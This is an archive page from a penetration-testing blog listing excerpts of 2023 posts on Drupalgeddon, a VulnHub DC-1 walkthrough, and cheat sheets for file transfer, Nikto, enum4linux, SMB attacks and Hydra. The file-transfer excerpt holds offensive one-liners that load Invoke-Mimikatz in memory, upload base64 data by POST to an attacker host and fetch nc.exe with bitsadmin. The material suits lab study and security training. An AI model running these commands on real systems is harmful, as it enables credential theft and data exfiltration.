2023 – Page 6 – NetwerkLABS

Attacking Drupal

Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities in existence. CVE-2014-3704, known as Drupalgeddon,…

Bharath Narayanasamy drupal

VulnLAB Practical LABS

Walkthrough – VulnHUB DC-1

Enumeration Nmap scan nmap -sC -sV -p- -A -T5 172.16.1.106 -oN dc01.txt Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 07:04 CEST Nmap scan report for 172.16.1.106 Host is up (0.0015s latency). Not shown: 65531 closed…

Bharath Narayanasamy drupal, walkthrough, dc-1, dirtyCOW

Cheat Sheets

FILE TRANSFER – Cheat Sheet

CommandDescription Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1Download a file with PowerShellIEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')Execute a file in memory using PowerShellInvoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64Upload a file with PowerShellbitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exeDownload a file using Bitsadmincertutil.exe -verifyctl -split…

Bharath Narayanasamy file-transfer

Cheat Sheets

Nikto Cheat Sheet

Nikto Cheat Sheet COMMANDDESCRIPTIONnikto -h http://nlabs.localScans the specified hostnikto -h http://nlabs.local -Tuning 6Uses a specific scan tuning levelnikto -h http://nlabs.local -port 8080Scans the specified portnikto -h http://nlabs.local -sslScans for SSL vulnerabilitiesnikto -h http://nlabs.local -Format htmlFormats output…

Bharath Narayanasamy nikto

Cheat Sheets

Enum4Linux Cheat sheet

enum4linux Cheat Sheet COMMANDDESCRIPTIONenum4linux -v target-ipVerbose mode, shows the underlying commands being executed by enum4linuxenum4linux -a target-ipDo Everything, runs all options apart from dictionary based share name guessingenum4linux -U target-ipLists usernames, if the server allows it…

Bharath Narayanasamy enum4linux

Cheat Sheets

Linux Commands – Cheat Sheet

Bash Commands uname -aShow system and kernelhead -n1 /etc/issueShow distributionmountShow mounted filesystemsdateShow system dateuptimeShow uptimewhoamiShow your usernameman commandShow manual for command ls Options -aShow all (including hidden)-RRecursive list-rReverse order-tSort by last modified-SSort by file size-lLong listing format-1One file…

Bharath Narayanasamy linux, commands

Cheat Sheets

Cheat sheet – SMB Attacks

SMB Enumeration Enumerate Hostname - nmblookup -A [ip] List Shares smbmap -H [ip/hostname] echo exit | smbclient -L \\\\[ip] nmap --script smb-enum-shares -p 139,445 [ip] Check Null Sessions smbmap -H [ip/hostname] rpcclient -U "" -N [ip] smbclient…

Bharath Narayanasamy

VulnLAB

ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting SMB

Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using…

Bharath Narayanasamy rpcclient, crackmapexec, enum4linux, hashcat, responder, impacket, SMB, smbmap

VulnLAB

Helpful Websites

Wordlists https://github.com/danielmiessler/SecLists https://github.com/Dormidera/WordList-Compendium https://github.com/kaonashi-passwords/Kaonashi https://github.com/google/fuzzing/tree/master/dictionaries https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm https://weakpass.com/wordlist/ https://wordlists.assetnote.io/ https://github.com/fssecur3/fuzzlists https://hashkiller.io/listmanager https://github.com/Karanxa/Bug-Bounty-Wordlists General Linux Kernel CVEs | All CVEs https://github.com/lucyoa/kernel-exploits Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Linux Privilege Escalation - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md Checklist - Linux Privilege Escalation - https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist Sushant 747's…

Bharath Narayanasamy

VulnLAB

Hydra Cheat Sheet

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to…

Bharath Narayanasamy hydra, brute-force